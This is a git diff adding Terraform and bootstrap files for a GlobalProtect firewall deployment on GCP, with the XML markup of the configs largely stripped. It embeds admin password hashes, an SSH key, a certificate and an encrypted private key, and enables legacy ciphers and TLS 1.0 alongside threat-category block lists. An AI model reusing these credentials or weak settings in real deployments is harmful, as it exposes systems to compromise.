pm6ekPi5wCuiemQ94fYYufj0viIlMjjxhEFi7j3TB2Ro + + + + + + tls1-0 + max + + dummy-gw-cert + + + + + + + + + all + + + + + + + $1$dwadmvhu$fzo/POkYDQ/Z/IKyLtmlX. + + + $1$henwxpvq$KjL6f7B5gjVBDTEDT6pB6/ + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + ping + + + + + + + + 3 + 5 + wait-recover + + + + + yes + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + ethernet1/1 + tunnel.1 + ethernet1/2 + + + + + + + + ipv4 + ethernet1/1 + + + + + no + + + tunnel.1 + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + + + yes + yes + yes + yes + + + FW-1 + yes + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo= + + + yes + yes + yes + yes + + + FW-1 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + tunnel.1 + + + yes + + + + + ethernet1/2 + + + + + + + + + + + + + + + ethernet1/1 + + + + + untrust + + + tunnel-zone + + + any + + + any + + any + no + + + + + + ethernet1/2 + + + + + trust + + + tunnel-zone + + + any + + + any + + any + + + + + + + + untrust + + + tunnel-zone + + + any + + + any + + + any + + + any + + + any + + + application-default + + + any + + allow + yes + no + + + + trust + + + tunnel-zone + + + any + + + any + + + any + + + any + + + any + + + application-default + + + any + + allow + + + + + + + + ethernet1/1 + tunnel.1 + ethernet1/2 + + + + + + + + + + 30 + + + 3 + + + 180 + + + + + + local + Any + Enter login credentials + + + gateway-ssl-tls + yes + + + + + + + any + + + any + + + 192.168.16.10-192.168.16.30 + + + no + no + + + tunnel.1 + + + + + + + + diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt new file mode 100644 index 00000000..3606b11c --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt @@ -0,0 +1,14 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-1 +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt @@ -0,0 +1 @@ + diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal.tf b/gcp/GP-NoAutoScaling/bootstrap-portal.tf new file mode 100644 index 00000000..6f6dbe07 --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-portal.tf @@ -0,0 +1,31 @@ +resource "google_storage_bucket" "portal_bucket" { + name = "portal-${random_id.random_number.hex}" + storage_class = "REGIONAL" + location = var.GCP_Region + project = google_project.globalprotect.number +} +resource "google_storage_bucket_object" "portal_bootstrap" { + name = "config/bootstrap.xml" + source = "bootstrap-portal/bootstrap.xml" + bucket = google_storage_bucket.portal_bucket.name +} +resource "google_storage_bucket_object" "portal_init_cfg" { + name = "config/init-cfg.txt" + source = "bootstrap-portal/init-cfg.txt" + bucket = google_storage_bucket.portal_bucket.name +} +resource "google_storage_bucket_object" "portal_content" { + name = "content/null.txt" + source = "bootstrap-portal/null.txt" + bucket = google_storage_bucket.portal_bucket.name +} +resource "google_storage_bucket_object" "portal_software" { + name = "software/null.txt" + source = "bootstrap-portal/null.txt" + bucket = google_storage_bucket.portal_bucket.name +} +resource "google_storage_bucket_object" "portal_license" { + name = "license/null.txt" + source = "bootstrap-portal/null.txt" + bucket = google_storage_bucket.portal_bucket.name +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml new file mode 100644 index 00000000..181c989d --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml @@ -0,0 +1,2424 @@ + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + + + yes + yes + yes + yes + + + yes + FW-1 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo= + + + yes + yes + yes + yes + + + FW-1 + mgmt-interface-swap + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + + + + + + + + + ethernet1/1 + + + + + + + + ethernet1/1 + vlan + loopback + tunnel + + + + gp-default + + + + + + + + + + + no + Any + local + Enter login credentials + Username + Password + + + portal-ssl-tls + + ipv4 + ethernet1/1 + + + factory-default + factory-default + + + + + + + + + + + 20 + yes + + + + + + + 52.200.14.80 + + + + 1 + + + no + + + 5 + + + + no + + + any + + + any + + + 0 + 0 + + + + + + user-logon + + + + + 24 + + + + + allowed + + + + + prompt + + + + + yes + + + + + yes + + + + + yes + + + + + 30 + + + + + 5 + + + + + no + + + + + 0 + + + + + 15 + + + + + yes + + + + + <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Notice</h1><p style="margin: 0;font-size: 15px; line-height: 1.2em;">To access the network, you must first connect to GlobalProtect.</p></div> + + + + + yes + + + + + no + + + + + <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Captive Portal Detected</h1><p style="margin: 0; font-size: 15px; line-height: 1.2em;">GlobalProtect has temporarily permitted network access for you to connect to the Internet. Follow instructions from your internet provider.</p><p style="margin: 0; font-size: 15px; line-height: 1.2em;">If you let the connection time out, open GlobalProtect and click Connect to try again.</p></div> + + + + + user-and-machine + + + + + 7 + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + 0 + + + + + -1 + + + + + no + + + + + 0 + + + + + 5 + + + + + 5 + + + + + 30 + + + + + yes + + + + + no + + + + + no + + + + + yes + + + + + yes + + + + + no + + + + + 4501 + + + + + You have attempted to access a protected resource that requires additional authentication. Proceed to authenticate at + + + + + yes + + + + + no + + + + + 1 + no + no + no + no + 443 + + + -AQ==9EIXqBFzhp4IZxdTxSVTZG/12Vs=iH76LFLerpHJ1S680bBopQ== + + + no + + + + + + + + + + + + + + + + Block outbound sessions that match a malicious domain and have been redirected to a configured sinkhole IP address. + + any + + + any + + + any + + + Sinkhole-IPv4 + Sinkhole-IPv6 + + + any + + + any + + + any + + + any + + + any + + deny + default + + Outbound + + Outbound + + + + + + + allow + no + yes + + + Inbound + + + default + + + drop + no + yes + default + + + + + + + + + + + any + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + + + + + + + + + + + + + + + + + + + +
+ + 72.5.65.111 + + + 2600:5200::1 + +
+ + + + + + + + + Outbound-AV + + + Outbound-AS + + + Outbound-VP + + + Outbound-URL + + + Outbound-FB + + + Outbound-WF + + + + + Inbound-AV + + + Inbound-AS + + + Inbound-VP + + + Inbound-FB + + + Inbound-WF + + + + + Internal-AV + + + Internal-AS + + + Internal-VP + + + Internal-FB + + + Internal-WF + + + + + Alert-Only-AV + + + Alert-Only-AS + + + Alert-Only-VP + + + Alert-Only-URL + + + Alert-Only-FB + + + Alert-Only-WF + + + + + Outbound-AV + + + Outbound-AS + + + Outbound-VP + + + Outbound-URL + + + Outbound-FB + + + Outbound-WF + + + + + + + color3 + + + color24 + + + color20 + + + color13 + + + Outbound to the Internet + + + Inbound from the Internet + + + Internal to Internal + + + version 1.0.6: version of this iron-skillet template file + + + + + + + + + + + + + alert + alert + + + alert + alert + + + alert + alert + + + alert + alert + + + alert + alert + + + alert + alert + + + + + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + + + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + + + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + + + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + Use this profile for rules needing modifications to the standard + + + + + + + + + + + single-packet + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + single-packet + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + single-packet + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + high + critical + + any + any + single-packet + + + + + + + low + informational + medium + + any + any + disable + + + + + + + + + + + disable + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + any + + any + any + disable + + + + + + + + + + + single-packet + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + + any + + + any + + + critical + + any + client + any + disable + + + + + + + any + + + any + + + high + + any + client + any + disable + + + + + + + any + + + any + + + medium + + any + client + any + disable + + + + + + + any + + + any + + + critical + + any + server + any + disable + + + + + + + any + + + any + + + high + + any + server + any + disable + + + + + + + any + + + any + + + medium + + any + server + any + disable + + + + + + + + + + + + + WW's profile + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + medium + + + any + + any + any + any + disable + + + + + + + + + + + any + + + any + + + any + + any + any + any + disable + + + + + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + yes + yes + yes + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + yes + yes + yes + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + URL List + + + URL List + + + URL List + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + + + + + + + + + + yes + yes + yes + yes + yes + yes + + + yes + yes + + + no + no + + + yes + yes + + + tls1-2 + no + no + no + no + + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + +
+
+
+
+ + + + $1$cymvlwsn$RRpD0YIgly7MQi2OwhBhV0 + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo= + + + + yes + 8 + + + + + + e8d8421e + e8d8421e + Mar 25 14:04:21 2020 GMT + /CN=GP-CA + Mar 25 14:04:21 2021 GMT + GP-CA + 1616681061 + yes + /CN=GP-CA + -----BEGIN CERTIFICATE----- +MIICwDCCAaigAwIBAgIJANrYfmxATInkMA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV +BAMTBUdQLUNBMB4XDTIwMDMyNTE0MDQyMVoXDTIxMDMyNTE0MDQyMVowEDEOMAwG +A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCsRu/s +uKqCjcZ72Yw5vN7HOQ8VoRZdafB8FAPNS5+Az+9KBNlKRAIT9K342JDZis4loQ3T +iN6rw8h2tN3vQH987q31bSTUT3ztd82gl/EzRexRNcGwQzm4VgtbzmTm2qnqqIps +DueALRDu0SZZX++EWufWxko5wiz+rk0ie3KgGYXJlFzf70Hwnf5P6/fWOIHutk9b +5n4CP1JMdP5ihF8EmRxwqTDzUpBU+MKU+QkpGkIh4dADvDiPEi55N9sRWkqxqOP5 +E78OxxUKGZua1eItevFjU45fQRKc2tyavVIhQjy/Z044rqJF60mt+r0v6er7i3o6 +KluBdl7P9dLeGdahAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE +MA0GCSqGSIb3DQEBCwUAA4IBAQBH5ANVFfZjJNCT+/448Ic3xCj5R5PepeATU45m ++nGNhjVpE4615A4gnKbBdY0m/LDLJX0tmlmGLPNxJzIyW65gz0i9fXtNydp3Bw6c +j9HD78IJST3o8wxREMzii+qhHyyv7Z3rjVYl2ZCQleWJ/Sl1u4Fui1pv1TSJ9g76 +nlWZYAvojlohXKZ+w8ApPantfAYtbh2cxfeml5abP7SfRDOWJxnNH/t/4fkwbh2t +TiKlWPCWC97tIqhu8tGZAVcW10pi3OJxT7FQ3n85p3xC59SgkN7O4W2Z/v9JnYan +QvnpOZcbAGndlh45yV1ePK+NiAgRPRYfL7M18pPXXaWdfr1L +-----END CERTIFICATE----- + + RSA + -AQ==cCMHUK/S6nkVFYzdgY+hCSo7iGU=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 + + + a505da21 + e8d8421e + Mar 25 14:04:43 2020 GMT + /CN=GP-CA + Mar 25 14:04:43 2021 GMT + dummy-portal-cert + 1616681083 + no + /CN=dummy-portal-cert + -----BEGIN CERTIFICATE----- +MIIDFzCCAf+gAwIBAgIEa51q2zANBgkqhkiG9w0BAQsFADAQMQ4wDAYDVQQDEwVH +UC1DQTAeFw0yMDAzMjUxNDA0NDNaFw0yMTAzMjUxNDA0NDNaMBwxGjAYBgNVBAMT +EWR1bW15LXBvcnRhbC1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEA2lQTCdFX9ipNB5vNvsr1StRKySrYXfAFp2zd4+n6d7SbauoIYgJ4H3TNqMjC +g0LqWj4ZIueD32DfLRGg1E+I+wlOMjHorT9WWl/s9rHnzWZcLiXB9+//dwOnOb7D +cmTKAEsyKMKuvAlcLZE/+2o0cBAEMZiOFseAnN//tOOBfw4ps/mdeGVnkdUxcDNw +qt7zuLewAuoWWYNG89kDK+yl+osk8HwVWb2h1hzX4ru3eA6Eu/Mi7LjVKmjA7rkf +Uuznxd+WXsXVzOXhZ+zcTjiWganOw68/indTlEnlr4AjDp2fjh0KHvN1RS+9LpG1 +q3/j6nG43rjqTgw4ck+B5oxdywIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQE +AwIDuDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkG +A1UdIwQCMAAwHQYDVR0OBBYEFMWfabSY9YsC5BxBsrW4YO25OhynMA0GCSqGSIb3 +DQEBCwUAA4IBAQARAtUAkncs7l+DEkRXI6eH0h5eQmwV51fNtTL1ZoXgol8RPQXS +MbfFmNZXlkDvC3cTeSuUABC6XYuK/YtTPR91H+c5JxZpDviPsZCRfPPVdXG3qO9+ +RDXMcCHQszSwiEfSnv031L0RKKhbxYBxhLQH+Rtj98gsRIBNvFDxcwxxesyjwXxd +Dn94Ai0XjpfRXUN8A3kpLm3w4D8Thly7Rbm48teG7iLTnp8cqIeXLTUoFVOy8q8i +mF0yAHinKlZowbAFo9u2OABVzRjWDcE9z0fUn8Nv1nrG8ROLlhGb3/S7wZYB6BZl ++wPtFwy/ddXpFb2dtfGk87+tbHiIk5jf2jCY +-----END CERTIFICATE----- + + RSA + 